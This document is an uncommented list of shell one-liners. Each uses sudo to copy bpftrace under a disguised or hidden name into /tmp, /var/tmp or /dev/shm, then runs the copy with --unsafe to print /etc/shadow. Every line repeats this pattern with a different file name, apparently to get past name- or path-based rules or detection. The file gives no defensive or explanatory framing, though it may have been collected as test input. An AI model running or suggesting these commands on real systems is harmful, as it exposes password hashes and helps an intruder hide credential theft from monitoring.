sudo cp /usr/bin/bpftrace /tmp/execd && sudo /tmp/execd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/trace64 && sudo /tmp/trace64 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/sysd && sudo /tmp/sysd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/agentd && sudo /tmp/agentd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/bpf && sudo /tmp/bpf --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/tracee && sudo /tmp/tracee --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/probe && sudo /tmp/probe --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/cmd && sudo /tmp/cmd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/runme && sudo /tmp/runme --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/task && sudo /tmp/task --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/job && sudo /tmp/job --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/execme && sudo /tmp/execme --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/hook && sudo /tmp/hook --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/driver && sudo /tmp/driver --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo install -m 0755 /usr/bin/bpftrace /tmp/alt && sudo /tmp/alt --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo install -m 0755 /usr/bin/bpftrace /tmp/alt2 && sudo /tmp/alt2 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo install -m 0755 /usr/bin/bpftrace /tmp/alt3 && sudo /tmp/alt3 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /var/tmp/b && sudo /var/tmp/b --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /var/tmp/c && sudo /var/tmp/c --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /var/tmp/d && sudo /var/tmp/d --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /dev/shm/r1 && sudo /dev/shm/r1 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /dev/shm/r2 && sudo /dev/shm/r2 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /dev/shm/r3 && sudo /dev/shm/r3 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/.hidden1 && sudo /tmp/.hidden1 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/.hidden2 && sudo /tmp/.hidden2 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/.hidden3 && sudo /tmp/.hidden3 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/daemon && sudo /tmp/daemon --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/service && sudo /tmp/service --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/sys && sudo /tmp/sys --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/proc && sudo /tmp/proc --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/node && sudo /tmp/node --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/binx && sudo /tmp/binx --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/execx && sudo /tmp/execx --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'
sudo cp /usr/bin/bpftrace /tmp/runit && sudo /tmp/runit --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'